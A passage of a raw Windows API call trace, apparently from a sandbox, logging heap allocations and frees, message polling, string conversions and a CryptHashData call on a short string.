Size=0x8) returned 0x2e54e38 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0128.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0128.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0128.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0128.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ed8 [0128.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0128.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0128.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0128.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0128.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ec8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0128.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0128.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0128.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0128.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0128.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0128.952] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0128.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0128.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0128.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e58 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0128.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0128.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0128.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0128.953] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0128.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0128.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0128.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e68 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0128.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0128.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0128.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0128.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0128.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0128.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0128.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0128.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d68 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0128.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0128.955] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0128.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0128.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0128.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0128.955] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0128.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0128.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0128.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0128.977] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0128.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0128.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0128.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0128.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0128.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0128.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0128.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0128.984] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0128.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0128.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0128.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0128.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.986] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0128.986] CryptHashData (hHash=0xa87110, pbData=0x2e54e58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 